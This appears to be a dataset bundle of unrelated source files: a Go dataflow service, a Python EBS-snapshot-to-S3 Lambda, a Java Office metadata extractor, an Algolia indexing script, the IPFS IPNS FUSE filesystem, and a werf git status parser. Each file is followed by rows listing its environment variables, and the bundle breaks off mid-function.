pl.RemainSource = in.Plan.GetRemainSource()
pl.PolicyId = in.Plan.GetPolicyId()
//TODO:how to get tenant
//pl.Tenant = in.Plan.GetTenant()
pl.Tenant = "tenant"
if in.Plan.GetSourceConn() != nil {
srcConn := _type.Connector{StorType:in.Plan.SourceConn.StorType}
fillReqConnector(&srcConn, in.Plan.SourceConn)
pl.SourceConn = srcConn
}
if in.Plan.GetDestConn() != nil {
destConn := _type.Connector{StorType:in.Plan.DestConn.StorType}
fillReqConnector(&destConn, in.Plan.DestConn)
pl.DestConn = destConn
}
if in.Plan.GetFilt() != nil {
if in.Plan.Filt.Prefix != "" {
pl.Filt = _type.Filter{Prefix:in.Plan.Filt.Prefix}
}
if len(in.Plan.Filt.Tag) > 0 {
for j := 0; j < len(in.Plan.Filt.Tag); j++ {
pl.Filt.Tag = append(pl.Filt.Tag, _type.KeyValue{Key:in.Plan.Filt.Tag[j].Key, Value:in.Plan.Filt.Tag[j].Value})
}
}
}
//TODO: Check validation of input parameter
err := plan.Update(&pl, b.datamoverClient)
if err == nil {
out.Err = ""
out.PlanId = string(pl.Id.Hex())
}else {
out.Err = err.Error()
}
log.Logf("Update plan finished, err:%s.", out.Err)
return err
}
func (b *dataflowService) RunPlan(ctx context.Context, in *pb.RunPlanRequest, out *pb.RunPlanResponse) error {
log.Log("Run plan is called in dataflow service.")
id := in.Id
//TODO: how to get tenant
//tenant := in.Tenant
tenant := "tenant"
jid, err := plan.Run(id, tenant, b.datamoverClient)
if err == nil {
out.JobId = string(jid.Hex())
out.Err = ""
}else {
out.JobId = ""
out.Err = err.Error()
}
log.Logf("Run plan err:%d.", out.Err)
return err
}
func (b *dataflowService) GetJob(ctx context.Context, in *pb.GetJobRequest, out *pb.GetJobResponse) error {
log.Log("Get job is called in dataflow service.")
id := in.Id
if in.Id == "all" {
id = ""
}
//TODO: how to get tenant
//tenant := in.Tenant
tenant := "tenant"
js,err := job.Get(id, tenant)
if err == nil {
out.Err = ""
}else {
out.Err = err.Error()
}
log.Logf("Get job err:%d.", out.Err)
//log.Logf("Getpolicy err:%d\n", rsp.ErrCode)
if err == nil {
for i := 0; i < len(js); i++ {
//des := "Total Capacity:" + js[i].TotalCapacity + ", "
//TODO: need change according to real scenario
des := "for test"
job := pb.Job{Id:string(js[i].Id.Hex()), Type:js[i].Type, PlanName:js[i].PlanName, PlanId:js[i].PlanId,
Description:des, SourceLocation:js[i].SourceLocation, DestLocation:js[i].DestLocation,
CreateTime:js[i].CreateTime.Unix(), EndTime:js[i].EndTime.Unix()}
out.Jobs = append(out.Jobs, &job)
}
}
//For debug -- begin
jsons, errs := json.Marshal(out)
if errs != nil {
log.Logf(errs.Error())
}else {
log.Logf("jsons1: %s.\n", jsons)
}
//For debug -- end
return err
}
| [
"\"DB_HOST\""
] | [] | [
"DB_HOST"
] | [] | ["DB_HOST"] | go | 1 | 0 | |
imager/imager.py | import base64
import boto3
import hashlib
import io
import json
import os
def handler(event, context):
snapid = event['event']['SnapshotID']
state = event['event']['State']
transitions = event['event']['Transitions']
limit = 'NO'
ebs_client = boto3.client('ebs')
s3_client = boto3.client('s3')
while(state):
if state == 'START':
response = ebs_client.list_snapshot_blocks(
SnapshotId = snapid
)
for block in response['Blocks']:
download = ebs_client.get_snapshot_block(
SnapshotId = snapid,
BlockIndex = block['BlockIndex'],
BlockToken = block['BlockToken']
)
sha256_hash = hashlib.sha256()
with io.FileIO('/tmp/'+snapid+'.tmp', 'wb') as f:
for b in download['BlockData']:
sha256_hash.update(b)
f.write(b)
f.close()
sha256_value = base64.b64decode(download['Checksum'])
if sha256_value.hex() == sha256_hash.hexdigest():
fname = str(block['BlockIndex']).zfill(10)+'_'+snapid+'_'+sha256_hash.hexdigest()+'_'+str(response['VolumeSize'])+'_'+str(response['BlockSize'])
s3_client.upload_file('/tmp/'+snapid+'.tmp', os.environ['BUCKET_NAME'], snapid+'/'+fname)
else:
fname = str(block['BlockIndex']).zfill(10)+'_'+snapid+'_'+sha256_value.hex()+'_'+str(response['VolumeSize'])+'_'+str(response['BlockSize'])
s3_client.upload_file('/tmp/'+snapid+'.tmp', os.environ['BUCKET_NAME'], 'error/'+snapid+'/'+fname)
try:
state = response['NextToken']
status = 'CONTINUE'
except:
state = ''
status = 'SUCCEEDED'
continue
else:
response = ebs_client.list_snapshot_blocks(
SnapshotId = snapid,
NextToken = state
)
for block in response['Blocks']:
download = ebs_client.get_snapshot_block(
SnapshotId = snapid,
BlockIndex = block['BlockIndex'],
BlockToken = block['BlockToken']
)
sha256_hash = hashlib.sha256()
with io.FileIO('/tmp/'+snapid+'.tmp', 'wb') as f:
for b in download['BlockData']:
sha256_hash.update(b)
f.write(b)
f.close()
sha256_value = base64.b64decode(download['Checksum'])
if sha256_value.hex() == sha256_hash.hexdigest():
fname = str(block['BlockIndex']).zfill(10)+'_'+snapid+'_'+sha256_hash.hexdigest()+'_'+str(response['VolumeSize'])+'_'+str(response['BlockSize'])
s3_client.upload_file('/tmp/'+snapid+'.tmp', os.environ['BUCKET_NAME'], snapid+'/'+fname)
else:
fname = str(block['BlockIndex']).zfill(10)+'_'+snapid+'_'+sha256_value.hex()+'_'+str(response['VolumeSize'])+'_'+str(response['BlockSize'])
s3_client.upload_file('/tmp/'+snapid+'.tmp', os.environ['BUCKET_NAME'], 'error/'+snapid+'/'+fname)
try:
state = response['NextToken']
status = 'CONTINUE'
except:
state = ''
status = 'SUCCEEDED'
continue
transitions += 1
if transitions == 2500:
limit = 'YES'
transitions = 0
event = {}
event['SnapshotID'] = snapid
event['State'] = state
event['Transitions'] = transitions
if limit == 'YES':
ssm_client = boto3.client('ssm')
response = ssm_client.get_parameter(
Name = os.environ['IMAGE_FUNCTION']
)
step_function = response['Parameter']['Value']
sfn_client = boto3.client('stepfunctions')
sfn_client.start_execution(
stateMachineArn = step_function,
input = json.dumps(event)
)
status = 'SUCCEEDED'
return {
'event': event,
'status': status,
} | [] | [] | [
"IMAGE_FUNCTION",
"BUCKET_NAME"
] | [] | ["IMAGE_FUNCTION", "BUCKET_NAME"] | python | 2 | 0 | |
src/main/java/sds/officeprocessor/commandhandlers/ExtractMetaProcessor.java | package sds.officeprocessor.commandhandlers;
import sds.officeprocessor.domain.events.ConvertToPdfFailed;
import java.io.IOException;
import java.time.LocalDateTime;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Component;
import com.npspot.jtransitlight.JTransitLightException;
import com.npspot.jtransitlight.consumer.ReceiverBusControl;
import com.npspot.jtransitlight.publisher.IBusControl;
import com.sds.storage.BlobInfo;
import com.sds.storage.BlobStorage;
import com.sds.storage.Guid;
import java.io.File;
import java.io.InputStream;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.nio.file.StandardOpenOption;
import java.util.List;
import org.apache.commons.io.FilenameUtils;
import sds.messaging.callback.AbstractMessageProcessor;
import sds.officeprocessor.domain.commands.ExtractMeta;
import sds.officeprocessor.domain.events.MetaExtracted;
import sds.officeprocessor.domain.models.Property;
import sds.officeprocessor.metaextractors.DocMetaExtractor;
import sds.officeprocessor.metaextractors.ExcelMetaExtractor;
import sds.officeprocessor.metaextractors.IMetaExtractor;
import sds.officeprocessor.metaextractors.PresentationMetaExtractor;
@Component
public class ExtractMetaProcessor extends AbstractMessageProcessor<ExtractMeta> {
private static final Logger LOGGER = LoggerFactory.getLogger(ExtractMetaProcessor.class);
ReceiverBusControl receiver;
IBusControl bus;
BlobStorage storage;
@Autowired
public ExtractMetaProcessor(ReceiverBusControl receiver, IBusControl bus,
BlobStorage storage) throws JTransitLightException, IOException {
this.bus = bus;
this.receiver = receiver;
this.storage = storage;
}
public void process(ExtractMeta message) {
try {
BlobInfo blob = storage.getFileInfo(new Guid(message.getBlobId()), message.getBucket());
List<Property> meta = null;
IMetaExtractor extractor = null;
File directory = new File(System.getenv("OSDR_TEMP_FILES_FOLDER"));
File tempFile = File.createTempFile("temp", ".tmp", directory);
try (InputStream fs = Files.newInputStream(Paths.get(tempFile.getCanonicalPath()), StandardOpenOption.DELETE_ON_CLOSE)) {
switch (FilenameUtils.getExtension(blob.getFileName()).toLowerCase()) {
case "doc":
case "docx":
case "odt":
extractor = new DocMetaExtractor();
meta = extractor.GetMeta(storage.getFileStream(new Guid(message.getBlobId()), message.getBucket()));
break;
case "xls":
case "xlsx":
case "ods":
extractor = new ExcelMetaExtractor();
meta = extractor.GetMeta(storage.getFileStream(new Guid(message.getBlobId()), message.getBucket()));
break;
case "ppt":
case "pptx":
case "odp":
extractor = new PresentationMetaExtractor();
meta = extractor.GetMeta(storage.getFileStream(new Guid(message.getBlobId()), message.getBucket()));
break;
default:
ConvertToPdfFailed convertToPdfFailed = new ConvertToPdfFailed();
convertToPdfFailed.setId(message.getId());
convertToPdfFailed.setMessage(String.format("Cannot find file converter for %s.", blob.getFileName()));
convertToPdfFailed.setCorrelationId(message.getCorrelationId());
convertToPdfFailed.setUserId(message.getUserId());
convertToPdfFailed.setTimeStamp(getTimestamp());
bus.publish(convertToPdfFailed);
return;
}
if (meta != null) {
MetaExtracted metaExtracted = new MetaExtracted();
metaExtracted.setMeta(meta);
metaExtracted.setCorrelationId(message.getCorrelationId());
metaExtracted.setTimeStamp(getTimestamp());
metaExtracted.setUserId(message.getUserId());
metaExtracted.setId(message.getId());
metaExtracted.setBlobId(message.getBlobId());
metaExtracted.setBucket(message.getBucket());
bus.publish(metaExtracted);
}
}
} catch (IOException ex) {
ConvertToPdfFailed convertToPdfFailed = new ConvertToPdfFailed();
convertToPdfFailed.setId(message.getId());
convertToPdfFailed.setMessage("Cannot convert file to pdf from bucket " + message.getBucket() + " with Id " + message.getBlobId() + ". Error: " + ex.getMessage());
convertToPdfFailed.setCorrelationId(message.getCorrelationId());
convertToPdfFailed.setUserId(message.getUserId());
convertToPdfFailed.setTimeStamp(getTimestamp());
bus.publish(convertToPdfFailed);
}
}
private String getTimestamp() {
//("yyyy-MM-dd'T'HH:mm:ss'Z'")
return LocalDateTime.now().toString();
}
}
| [
"\"OSDR_TEMP_FILES_FOLDER\""
] | [] | [
"OSDR_TEMP_FILES_FOLDER"
] | [] | ["OSDR_TEMP_FILES_FOLDER"] | java | 1 | 0 | |
algolia.py | import os
import csv
from algoliasearch.search_client import SearchClient
client = SearchClient.create("08KMSERF1B", str(os.environ.get("KEY")))
index = client.init_index("Project")
def add_records(filename: str):
with open(filename, newline="") as f:
csv_r = list(csv.DictReader(f, delimiter=";"))
len_idx = index.search("")["nbHits"]
if len(csv_r) > len_idx:
index.save_objects(
csv_r[len_idx:], {"autoGenerateObjectIDIfNotExist": "true"}
)
print(f"{len(csv_r[len_idx:]) - 1} new records added.")
return
print("Nothing new.")
if __name__ == "__main__":
add_records("projects.csv")
| [] | [] | [
"KEY"
] | [] | ["KEY"] | python | 1 | 0 | |
fuse/ipns/ipns_unix.go | // +build !nofuse
// package fuse/ipns implements a fuse filesystem that interfaces
// with ipns, the naming system for ipfs.
package ipns
import (
"context"
"errors"
"fmt"
"io"
"os"
core "github.com/ipfs/go-ipfs/core"
dag "github.com/ipfs/go-ipfs/merkledag"
mfs "github.com/ipfs/go-ipfs/mfs"
namesys "github.com/ipfs/go-ipfs/namesys"
path "github.com/ipfs/go-ipfs/path"
ft "github.com/ipfs/go-ipfs/unixfs"
fuse "gx/ipfs/QmSJBsmLP1XMjv8hxYg2rUMdPDB7YUpyBo9idjrJ6Cmq6F/fuse"
fs "gx/ipfs/QmSJBsmLP1XMjv8hxYg2rUMdPDB7YUpyBo9idjrJ6Cmq6F/fuse/fs"
peer "gx/ipfs/QmVf8hTAsLLFtn4WPCRNdnaF2Eag2qTBS6uR8AiHPZARXy/go-libp2p-peer"
cid "gx/ipfs/QmapdYm1b22Frv3k17fqrBYTFRxwiaVJkB299Mfn33edeB/go-cid"
logging "gx/ipfs/Qmbi1CTJsbnBZjCEgc2otwu8cUFPsGpzWXG7edVCLZ7Gvk/go-log"
ci "gx/ipfs/Qme1knMqwt1hKZbc1BmQFmnm9f36nyQGwXxPGVpVJ9rMK5/go-libp2p-crypto"
)
func init() {
if os.Getenv("IPFS_FUSE_DEBUG") != "" {
fuse.Debug = func(msg interface{}) {
fmt.Println(msg)
}
}
}
var log = logging.Logger("fuse/ipns")
// FileSystem is the readwrite IPNS Fuse Filesystem.
type FileSystem struct {
Ipfs *core.IpfsNode
RootNode *Root
}
// NewFileSystem constructs new fs using given core.IpfsNode instance.
func NewFileSystem(ipfs *core.IpfsNode, sk ci.PrivKey, ipfspath, ipnspath string) (*FileSystem, error) {
kmap := map[string]ci.PrivKey{
"local": sk,
}
root, err := CreateRoot(ipfs, kmap, ipfspath, ipnspath)
if err != nil {
return nil, err
}
return &FileSystem{Ipfs: ipfs, RootNode: root}, nil
}
// Root constructs the Root of the filesystem, a Root object.
func (f *FileSystem) Root() (fs.Node, error) {
log.Debug("filesystem, get root")
return f.RootNode, nil
}
func (f *FileSystem) Destroy() {
err := f.RootNode.Close()
if err != nil {
log.Errorf("Error Shutting Down Filesystem: %s\n", err)
}
}
// Root is the root object of the filesystem tree.
type Root struct {
Ipfs *core.IpfsNode
Keys map[string]ci.PrivKey
// Used for symlinking into ipfs
IpfsRoot string
IpnsRoot string
LocalDirs map[string]fs.Node
Roots map[string]*keyRoot
LocalLinks map[string]*Link
}
func ipnsPubFunc(ipfs *core.IpfsNode, k ci.PrivKey) mfs.PubFunc {
return func(ctx context.Context, c *cid.Cid) error {
return ipfs.Namesys.Publish(ctx, k, path.FromCid(c))
}
}
func loadRoot(ctx context.Context, rt *keyRoot, ipfs *core.IpfsNode, name string) (fs.Node, error) {
p, err := path.ParsePath("/ipns/" + name)
if err != nil {
log.Errorf("mkpath %s: %s", name, err)
return nil, err
}
node, err := core.Resolve(ctx, ipfs.Namesys, ipfs.Resolver, p)
switch err {
case nil:
case namesys.ErrResolveFailed:
node = ft.EmptyDirNode()
default:
log.Errorf("looking up %s: %s", p, err)
return nil, err
}
pbnode, ok := node.(*dag.ProtoNode)
if !ok {
return nil, dag.ErrNotProtobuf
}
root, err := mfs.NewRoot(ctx, ipfs.DAG, pbnode, ipnsPubFunc(ipfs, rt.k))
if err != nil {
return nil, err
}
rt.root = root
switch val := root.GetValue().(type) {
case *mfs.Directory:
return &Directory{dir: val}, nil
case *mfs.File:
return &FileNode{fi: val}, nil
default:
return nil, errors.New("unrecognized type")
}
}
type keyRoot struct {
k ci.PrivKey
alias string
root *mfs.Root
}
func CreateRoot(ipfs *core.IpfsNode, keys map[string]ci.PrivKey, ipfspath, ipnspath string) (*Root, error) {
ldirs := make(map[string]fs.Node)
roots := make(map[string]*keyRoot)
links := make(map[string]*Link)
for alias, k := range keys {
pid, err := peer.IDFromPrivateKey(k)
if err != nil {
return nil, err
}
name := pid.Pretty()
kr := &keyRoot{k: k, alias: alias}
fsn, err := loadRoot(ipfs.Context(), kr, ipfs, name)
if err != nil {
return nil, err
}
roots[name] = kr
ldirs[name] = fsn
// set up alias symlink
links[alias] = &Link{
Target: name,
}
}
return &Root{
Ipfs: ipfs,
IpfsRoot: ipfspath,
IpnsRoot: ipnspath,
Keys: keys,
LocalDirs: ldirs,
LocalLinks: links,
Roots: roots,
}, nil
}
// Attr returns file attributes.
func (*Root) Attr(ctx context.Context, a *fuse.Attr) error {
log.Debug("Root Attr")
a.Mode = os.ModeDir | 0111 // -rw+x
return nil
}
// Lookup performs a lookup under this node.
func (s *Root) Lookup(ctx context.Context, name string) (fs.Node, error) {
switch name {
case "mach_kernel", ".hidden", "._.":
// Just quiet some log noise on OS X.
return nil, fuse.ENOENT
}
if lnk, ok := s.LocalLinks[name]; ok {
return lnk, nil
}
nd, ok := s.LocalDirs[name]
if ok {
switch nd := nd.(type) {
case *Directory:
return nd, nil
case *FileNode:
return nd, nil
default:
return nil, fuse.EIO
}
}
// other links go through ipns resolution and are symlinked into the ipfs mountpoint
resolved, err := s.Ipfs.Namesys.Resolve(s.Ipfs.Context(), name)
if err != nil {
log.Warningf("ipns: namesys resolve error: %s", err)
return nil, fuse.ENOENT
}
segments := resolved.Segments()
if segments[0] == "ipfs" {
p := path.Join(resolved.Segments()[1:])
return &Link{s.IpfsRoot + "/" + p}, nil
}
log.Error("Invalid path.Path: ", resolved)
return nil, errors.New("invalid path from ipns record")
}
func (r *Root) Close() error {
for _, mr := range r.Roots {
err := mr.root.Close()
if err != nil {
return err
}
}
return nil
}
// Forget is called when the filesystem is unmounted. probably.
// see comments here: http://godoc.org/bazil.org/fuse/fs#FSDestroyer
func (r *Root) Forget() {
err := r.Close()
if err != nil {
log.Error(err)
}
}
// ReadDirAll reads a particular directory. Will show locally available keys
// as well as a symlink to the peerID key
func (r *Root) ReadDirAll(ctx context.Context) ([]fuse.Dirent, error) {
log.Debug("Root ReadDirAll")
var listing []fuse.Dirent
for alias, k := range r.Keys {
pid, err := peer.IDFromPrivateKey(k)
if err != nil {
continue
}
ent := fuse.Dirent{
Name: pid.Pretty(),
Type: fuse.DT_Dir,
}
link := fuse.Dirent{
Name: alias,
Type: fuse.DT_Link,
}
listing = append(listing, ent, link)
}
return listing, nil
}
// Directory is wrapper over an mfs directory to satisfy the fuse fs interface
type Directory struct {
dir *mfs.Directory
}
type FileNode struct {
fi *mfs.File
}
// File is wrapper over an mfs file to satisfy the fuse fs interface
type File struct {
fi mfs.FileDescriptor
}
// Attr returns the attributes of a given node.
func (d *Directory) Attr(ctx context.Context, a *fuse.Attr) error {
log.Debug("Directory Attr")
a.Mode = os.ModeDir | 0555
a.Uid = uint32(os.Getuid())
a.Gid = uint32(os.Getgid())
return nil
}
// Attr returns the attributes of a given node.
func (fi *FileNode) Attr(ctx context.Context, a *fuse.Attr) error {
log.Debug("File Attr")
size, err := fi.fi.Size()
if err != nil {
// In this case, the dag node in question may not be unixfs
return fmt.Errorf("fuse/ipns: failed to get file.Size(): %s", err)
}
a.Mode = os.FileMode(0666)
a.Size = uint64(size)
a.Uid = uint32(os.Getuid())
a.Gid = uint32(os.Getgid())
return nil
}
// Lookup performs a lookup under this node.
func (s *Directory) Lookup(ctx context.Context, name string) (fs.Node, error) {
child, err := s.dir.Child(name)
if err != nil {
// todo: make this error more versatile.
return nil, fuse.ENOENT
}
switch child := child.(type) {
case *mfs.Directory:
return &Directory{dir: child}, nil
case *mfs.File:
return &FileNode{fi: child}, nil
default:
// NB: if this happens, we do not want to continue, unpredictable behaviour
// may occur.
panic("invalid type found under directory. programmer error.")
}
}
// ReadDirAll reads the link structure as directory entries
func (dir *Directory) ReadDirAll(ctx context.Context) ([]fuse.Dirent, error) {
var entries []fuse.Dirent
listing, err := dir.dir.List(ctx)
if err != nil {
return nil, err
}
for _, entry := range listing {
dirent := fuse.Dirent{Name: entry.Name}
switch mfs.NodeType(entry.Type) {
case mfs.TDir:
dirent.Type = fuse.DT_Dir
case mfs.TFile:
dirent.Type = fuse.DT_File
}
entries = append(entries, dirent)
}
if len(entries) > 0 {
return entries, nil
}
return nil, fuse.ENOENT
}
func (fi *File) Read(ctx context.Context, req *fuse.ReadRequest, resp *fuse.ReadResponse) error {
_, err := fi.fi.Seek(req.Offset, io.SeekStart)
if err != nil {
return err
}
fisize, err := fi.fi.Size()
if err != nil {
return err
}
select {
case <-ctx.Done():
return ctx.Err()
default:
}
readsize := min(req.Size, int(fisize-req.Offset))
n, err := fi.fi.CtxReadFull(ctx, resp.Data[:readsize])
resp.Data = resp.Data[:n]
return err
}
func (fi *File) Write(ctx context.Context, req *fuse.WriteRequest, resp *fuse.WriteResponse) error {
// TODO: at some point, ensure that WriteAt here respects the context
wrote, err := fi.fi.WriteAt(req.Data, req.Offset)
if err != nil {
return err
}
resp.Size = wrote
return nil
}
func (fi *File) Flush(ctx context.Context, req *fuse.FlushRequest) error {
errs := make(chan error, 1)
go func() {
errs <- fi.fi.Flush()
}()
select {
case err := <-errs:
return err
case <-ctx.Done():
return ctx.Err()
}
}
func (fi *File) Setattr(ctx context.Context, req *fuse.SetattrRequest, resp *fuse.SetattrResponse) error {
if req.Valid.Size() {
cursize, err := fi.fi.Size()
if err != nil {
return err
}
if cursize != int64(req.Size) {
err := fi.fi.Truncate(int64(req.Size))
if err != nil {
return err
}
}
}
return nil
}
// Fsync flushes the content in the file to disk, but does not
// update the dag tree internally
func (fi *FileNode) Fsync(ctx context.Context, req *fuse.FsyncRequest) error {
errs := make(chan error, 1)
go func() {
errs <- fi.fi.Sync()
}()
select {
case err := <-errs:
return err
case <-ctx.Done():
return ctx.Err()
}
}
func (fi *File) Forget() {
err := fi.fi.Sync()
if err != nil {
log.Debug("forget file error: ", err)
}
}
func (dir *Directory) Mkdir(ctx context.Context, req *fuse.MkdirRequest) (fs.Node, error) {
child, err := dir.dir.Mkdir(req.Name)
if err != nil {
return nil, err
}
return &Directory{dir: child}, nil
}
func (fi *FileNode) Open(ctx context.Context, req *fuse.OpenRequest, resp *fuse.OpenResponse) (fs.Handle, error) {
var mfsflag int
switch {
case req.Flags.IsReadOnly():
mfsflag = mfs.OpenReadOnly
case req.Flags.IsWriteOnly():
mfsflag = mfs.OpenWriteOnly
case req.Flags.IsReadWrite():
mfsflag = mfs.OpenReadWrite
default:
return nil, errors.New("unsupported flag type")
}
fd, err := fi.fi.Open(mfsflag, true)
if err != nil {
return nil, err
}
if req.Flags&fuse.OpenTruncate != 0 {
if req.Flags.IsReadOnly() {
log.Error("tried to open a readonly file with truncate")
return nil, fuse.ENOTSUP
}
log.Info("Need to truncate file!")
err := fd.Truncate(0)
if err != nil {
return nil, err
}
} else if req.Flags&fuse.OpenAppend != 0 {
log.Info("Need to append to file!")
if req.Flags.IsReadOnly() {
log.Error("tried to open a readonly file with append")
return nil, fuse.ENOTSUP
}
_, err := fd.Seek(0, io.SeekEnd)
if err != nil {
log.Error("seek reset failed: ", err)
return nil, err
}
}
return &File{fi: fd}, nil
}
func (fi *File) Release(ctx context.Context, req *fuse.ReleaseRequest) error {
return fi.fi.Close()
}
func (dir *Directory) Create(ctx context.Context, req *fuse.CreateRequest, resp *fuse.CreateResponse) (fs.Node, fs.Handle, error) {
// New 'empty' file
nd := dag.NodeWithData(ft.FilePBData(nil, 0))
err := dir.dir.AddChild(req.Name, nd)
if err != nil {
return nil, nil, err
}
child, err := dir.dir.Child(req.Name)
if err != nil {
return nil, nil, err
}
fi, ok := child.(*mfs.File)
if !ok {
return nil, nil, errors.New("child creation failed")
}
nodechild := &FileNode{fi: fi}
var openflag int
switch {
case req.Flags.IsReadOnly():
openflag = mfs.OpenReadOnly
case req.Flags.IsWriteOnly():
openflag = mfs.OpenWriteOnly
case req.Flags.IsReadWrite():
openflag = mfs.OpenReadWrite
default:
return nil, nil, errors.New("unsupported open mode")
}
fd, err := fi.Open(openflag, true)
if err != nil {
return nil, nil, err
}
return nodechild, &File{fi: fd}, nil
}
func (dir *Directory) Remove(ctx context.Context, req *fuse.RemoveRequest) error {
err := dir.dir.Unlink(req.Name)
if err != nil {
return fuse.ENOENT
}
return nil
}
// Rename implements NodeRenamer
func (dir *Directory) Rename(ctx context.Context, req *fuse.RenameRequest, newDir fs.Node) error {
cur, err := dir.dir.Child(req.OldName)
if err != nil {
return err
}
err = dir.dir.Unlink(req.OldName)
if err != nil {
return err
}
switch newDir := newDir.(type) {
case *Directory:
nd, err := cur.GetNode()
if err != nil {
return err
}
err = newDir.dir.AddChild(req.NewName, nd)
if err != nil {
return err
}
case *FileNode:
log.Error("Cannot move node into a file!")
return fuse.EPERM
default:
log.Error("Unknown node type for rename target dir!")
return errors.New("unknown fs node type")
}
return nil
}
func min(a, b int) int {
if a < b {
return a
}
return b
}
// to check that out Node implements all the interfaces we want
type ipnsRoot interface {
fs.Node
fs.HandleReadDirAller
fs.NodeStringLookuper
}
var _ ipnsRoot = (*Root)(nil)
type ipnsDirectory interface {
fs.HandleReadDirAller
fs.Node
fs.NodeCreater
fs.NodeMkdirer
fs.NodeRemover
fs.NodeRenamer
fs.NodeStringLookuper
}
var _ ipnsDirectory = (*Directory)(nil)
type ipnsFile interface {
fs.HandleFlusher
fs.HandleReader
fs.HandleWriter
fs.HandleReleaser
}
type ipnsFileNode interface {
fs.Node
fs.NodeFsyncer
fs.NodeOpener
}
var _ ipnsFileNode = (*FileNode)(nil)
var _ ipnsFile = (*File)(nil)
| [
"\"IPFS_FUSE_DEBUG\""
] | [] | [
"IPFS_FUSE_DEBUG"
] | [] | ["IPFS_FUSE_DEBUG"] | go | 1 | 0 | |
pkg/true_git/status/status.go | package status
import (
"bufio"
"context"
"fmt"
"os"
"os/exec"
"strings"
"github.com/werf/logboek"
"github.com/werf/logboek/pkg/types"
"github.com/werf/werf/pkg/true_git"
)
// Status returns Result with path lists of untracked files and modified files for index and worktree.
// The function counts each file status as Modified if it is not Unmodified or Untracked ([ADU] == M).
// The function does not work with ignored, renamed and copied files.
func Status(ctx context.Context, workTreeDir string) (r Result, err error) {
logboek.Context(ctx).Debug().
LogProcess("Status %s", workTreeDir).
Options(func(options types.LogProcessOptionsInterface) {
if !debug() {
options.Mute()
}
}).
Do(func() {
r, err = status(ctx, workTreeDir)
if debug() {
logboek.Context(ctx).Debug().LogF("result: %+v\n", r)
logboek.Context(ctx).Debug().LogLn("err:", err)
}
})
return
}
func status(ctx context.Context, workTreeDir string) (Result, error) {
result := Result{}
args := append([]string{}, "-c", "core.quotePath=false", "status", "--porcelain=v2", "--untracked-files=all", "--no-renames")
cmd := exec.Command("git", args...)
cmd.Dir = workTreeDir
outputBuffer := true_git.SetCommandRecordingLiveOutput(ctx, cmd)
commandString := strings.Join(append([]string{cmd.Path}, cmd.Args[1:]...), " ")
detailedErrFunc := func(err error) error {
return fmt.Errorf("%s\n\ncommand: %q\noutput:\n%s", err, commandString, outputBuffer.String())
}
err := cmd.Run()
if debug() {
logboek.Context(ctx).Debug().LogLn("command:", commandString)
logboek.Context(ctx).Debug().LogLn("err:", err)
}
if err != nil {
return result, detailedErrFunc(fmt.Errorf("git command failed: %q", err))
}
scanner := bufio.NewScanner(outputBuffer)
for scanner.Scan() {
entryLine := scanner.Text()
if len(entryLine) == 0 {
return result, detailedErrFunc(fmt.Errorf("invalid git status line format: \"\""))
}
formatTypeCode := entryLine[0]
switch formatTypeCode {
case '1':
if err := parseOrdinaryEntry(&result, entryLine); err != nil {
return result, detailedErrFunc(err)
}
case 'u':
if err := parseUnmergedEntry(&result, entryLine); err != nil {
return result, detailedErrFunc(err)
}
case '?':
if err := parseUntrackedEntry(&result, entryLine); err != nil {
return result, detailedErrFunc(err)
}
case '2', '!':
panic(detailedErrFunc(fmt.Errorf("unexpected git status line format: %q", entryLine)))
default:
return result, detailedErrFunc(fmt.Errorf("invalid git status line format: %q", entryLine))
}
}
return result, err
}
type ordinaryEntry struct {
xy string
sub string
mh, mi, mw string
hH, hI string
path string
raw string
}
// 1 <XY> <sub> <mH> <mI> <mW> <hH> <hI> <path>
func parseOrdinaryEntry(r *Result, entryLine string) error {
fields := strings.Split(entryLine, " ")
entry := ordinaryEntry{
xy: fields[1],
sub: fields[2],
mh: fields[3],
mi: fields[4],
mw: fields[5],
hH: fields[6],
hI: fields[7],
path: strings.Join(fields[8:], " "), // name with spaces
raw: entryLine,
}
switch {
case entry.sub == "N...":
return parseOrdinaryRegularFileEntry(r, entry)
case entry.sub[0] == 'S':
return parseOrdinarySubmoduleEntry(r, entry)
default:
return fmt.Errorf("invalid git status ordinary <sub> field: %q (%q)", entry.raw, entry.sub)
}
}
// 1 <XY> N... <mH> <mI> <mW> <hH> <hI> <path>
func parseOrdinaryRegularFileEntry(result *Result, entry ordinaryEntry) error {
if len(entry.xy) != 2 {
return fmt.Errorf("invalid git status ordinary <XY> field: %q (%q)", entry.raw, entry.xy)
}
stageCode := entry.xy[0]
worktreeCode := entry.xy[1]
if stageCode != '.' {
result.Index.pathList = append(result.Index.pathList, entry.path)
result.Index.addToChecksum(entry.path, entry.mi, entry.hI)
}
if worktreeCode != '.' {
result.Worktree.pathList = append(result.Worktree.pathList, entry.path)
}
return nil
}
// 1 <XY> <sub> <mH> <mI> <mW> <hH> <hI> <path>
// 1 <XY> S<c><m><u> <mH> <mI> <mW> <hH> <hI> <path>
func parseOrdinarySubmoduleEntry(result *Result, entry ordinaryEntry) error {
if len(entry.sub) != 4 {
return fmt.Errorf("invalid git status ordinary <sub> field: %q (%q)", entry.raw, entry.sub)
}
stageCode := entry.xy[0]
worktreeCode := entry.xy[1]
commitChangedCode := entry.sub[1]
trackedChangesCode := entry.sub[2]
untrackedChangesCode := entry.sub[3]
newSubmoduleFunc := func(scopeCode uint8) submodule {
return submodule{
Path: entry.path,
IsAdded: scopeCode == 'A',
IsDeleted: scopeCode == 'D',
IsModified: scopeCode == 'M',
IsCommitChanged: commitChangedCode != '.',
HasTrackedChanges: trackedChangesCode != '.',
HasUntrackedChanges: untrackedChangesCode != '.',
}
}
if stageCode != '.' {
result.Index.submodules = append(result.Index.submodules, newSubmoduleFunc(stageCode))
result.Index.addToChecksum(entry.path, entry.mi, entry.hI)
}
if worktreeCode != '.' {
result.Worktree.submodules = append(result.Worktree.submodules, newSubmoduleFunc(worktreeCode))
}
return nil
}
type unmergedEntry struct {
xy string
sub string
m1, m2, m3, mW string
h1, h2, h3 string
path string
raw string
}
// u <xy> <sub> <m1> <m2> <m3> <mW> <h1> <h2> <h3> <path>
func parseUnmergedEntry(result *Result, entryLine string) error {
fields := strings.Fields(entryLine)
entry := unmergedEntry{
xy: fields[1],
sub: fields[2],
m1: fields[3],
m2: fields[4],
m3: fields[5],
mW: fields[6],
h1: fields[7],
h2: fields[8],
h3: fields[9],
path: strings.Join(fields[10:], " "), // name with spaces
raw: entryLine,
}
if len(entry.xy) != 2 {
